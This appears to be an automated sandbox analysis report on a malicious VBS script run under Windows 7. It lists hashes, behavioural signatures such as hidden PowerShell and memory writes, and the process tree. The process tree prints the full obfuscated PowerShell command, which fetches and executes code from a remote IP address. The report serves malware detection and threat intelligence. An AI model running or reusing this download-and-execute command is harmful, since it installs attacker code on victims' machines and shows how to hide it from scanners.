Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
29/01/2025, 02:39
Static task
static1
Behavioral task
behavioral1
Sample
4f90acd8429781753e1b43f7c32efaa4ddc9fc108eaec01d9d1dd4ddc444208c.vbs
Resource
win7-20240903-en
6 signatures
150 seconds
General
-
Target
4f90acd8429781753e1b43f7c32efaa4ddc9fc108eaec01d9d1dd4ddc444208c.vbs
-
Size
6KB
-
MD5
5cd058a830624c948fcf2e91589e523c
-
SHA1
f3ff01a26d55f8c01dc6d930afc526653164e2fd
-
SHA256
4f90acd8429781753e1b43f7c32efaa4ddc9fc108eaec01d9d1dd4ddc444208c
-
SHA512
786773fd9d87fa23680cface7236c349b560c7ad4241624f91a6fd6d6cfc05d7e554555614b93a78a2be8000b2c4e5c1b1fca9a312bd68a77cbab1b38ff23370
-
SSDEEP
96:ej/Eb/Eb/Eb/Eb/Eb/Eb/Eb/Eb/Eb/Eb/Eb/Eb/Eb/Eb/Eb/Eb/Eb/Eb/Eb/Eb/3:8PjGZOmya03D
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 4 2688 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2688 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2688 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2688 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2756 wrote to memory of 2688 2756 WScript.exe 31 PID 2756 wrote to memory of 2688 2756 WScript.exe 31 PID 2756 wrote to memory of 2688 2756 WScript.exe 31
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4f90acd8429781753e1b43f7c32efaa4ddc9fc108eaec01d9d1dd4ddc444208c.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2756 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI Sleep 2;[BYTe[]];$FmxQdSlWaGye='IeX(NeW-OBJeCT NeT.W';$KtWLqHZBjFgp='eBCLIeNT).DOWNLO';$UeivQcqgkxEH='repoooos(''http://45.88.186.162/test//update.php'')'.RePLACe('repoooos','ADSTRING');Sleep 1;IeX($FmxQdSlWaGye+$KtWLqHZBjFgp+$UeivQcqgkxEH);2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2688
-